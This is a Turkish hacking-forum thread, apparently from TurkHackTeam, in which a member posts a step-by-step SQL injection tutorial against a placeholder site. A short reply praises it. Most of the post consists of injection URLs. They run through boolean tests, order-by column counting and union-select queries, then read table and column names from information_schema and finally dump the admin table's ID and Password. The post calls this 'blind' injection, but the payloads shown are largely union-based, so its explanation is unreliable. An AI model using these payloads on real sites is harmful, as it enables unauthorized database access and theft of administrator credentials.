THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Blind Sql Injection - Geniş Anlatım

K37 King - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Mesajlar:
974
Konular:
120
Teşekkür (Etti):
231
Teşekkür (Aldı):
119
Ticaret:
(0) %
07-06-2014 00:49
#1
Cool
Blind Sql Injection - Geniş Anlatım

"Blind Sql Injection" Nedir ?

"Blind Sql Injection" Bir Injection Yöntemidir.Bu Hata Almadan Uygulayacağımız Bir Yöntemdir.Blind Kör Anlamına Gelmektedir.Sitenin Sonuna ' İşareti Koyduğumuzda Site Hata Vermek Yerine Sayfa Değiştirir.Yani Site Hata Vermez Fakat Biz Hatayı Sayfanın Değişmesinden Anlarız.


"Blind Sql Injection" Nasıl Uygulanır ?

Adım 1- Değerleri Kıyaslayalım

Sitedeki ID Değerinin Sonuna and 1=1 Veya 1=0 Yazıyoruz.Böylece Siteden 1=1 İse Ve 1=0 İse Ne Olacağını İstiyoruz.1=1 Yaptığımızda Site Normal Sayfasında Açılır Ama 1=0 Yaptığımızda İse Site Başka Bir Sayfayı Gösterir.
Kod:
www.orneksitemiz.com/article.php?id=1+and+1=1
www.orneksitemiz.com/article.php?id=1+and+1=0


Adım 2- Kolon Sayısını Bulalım

Kolon Sayısını Bulurkende Sayfa Değişimini Kullanacağız.And "1=1"Devamına Order+By Komutumuzu Yazalım.Order+By+1 Sondaki Sayıyı Arttıralım Sayfa Değişinceye Kadar.Burada Kolon Sayısını Hangi Sayıda Sayfa Değiştiğinden Anlayacağız.Ben 4 Kolon Bulduğumuzu Varsayıyorum.
Kod:
www.orneksitemiz.com/article.php?id=1+and+1=1+order+by+1
Adım 3- Sorgu Oluşturalım


Burada 1=1 Eşitliğinin Yerine 1=0 Eşitsizliğini Kullanacağız.1=0' dan Sonra "union+select+0,1,2,3" Yazıyoruz.2 Numaralı Kullanacağımızı Varsayıyorum.

Kod:
www.orneksitemiz.com/article.php?id=1+and+1=0+union+select+0,1,2,3
Adım 4- Tabloları Çekelim

Tabloları Çekmek İçin 2 Numaralı Kolonu Kullanacağız.Normal Sql Injectionda Olduğu Gibi Devam Edelim.
Kod:
www.orneksitemiz.com/article.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+information_schema.tables
Adım 5- Tablodan Veriyi Çekelim

Buradada Normal Sql Injection' da Olduğu Gibi Devam Ediyoruz.Ben Admin Tablosunun Çıktığını Varsayıyorum.Ama Dikkat Etmemiz Gereken Bir Yer Var.Tablo Adını Hexlememiz Lazım.Admin Tablosunun Hex Karşılığı "61646d696e".Google Amcaya "Text To Hex Convertor" Yazın Çıkar.En Sona Table Name = Hex Kodumuzu Yazacağız.
Kod:
www.orneksitemiz.com/article.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+information_schema.columns+where+table_name='61646d696e'
Adım 6- Kolonlardan Verileri Çekelim

Evet Admin Tablosundan ID ve Password Kolonları Çıktığını Varsayıyorum.ID ve Password Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.
Kod:
www.orneksitemiz.com/article.php?id=1+and+1=1+union+select+0,1,concat(ID,0x3a,Password),3+from+admin
Makale K37 King Tarafından Yazılmıştır. - Copyright© K37 King | TurkHackTeam.Net/Org
---------------------

Söylediklerimden Çok Gizlediklerimde Saklıyım

THT Defacer Kampüsü

Since 2013 - Sonunu Düşünen Kahraman Olamaz
quespy - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2014
Nereden:
Bursa
Mesajlar:
2.271
Konular:
278
Teşekkür (Etti):
733
Teşekkür (Aldı):
454
Ticaret:
(0) %
07-06-2014 00:56
#2
eline sağlık güzel anlatım olmuş
---------------------
Merak edilecek bir yanimiz yok siradan biriyiz bahsedilecek kadar özel bahsi edilmeyecek kadar eskiyiz
K37 King Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler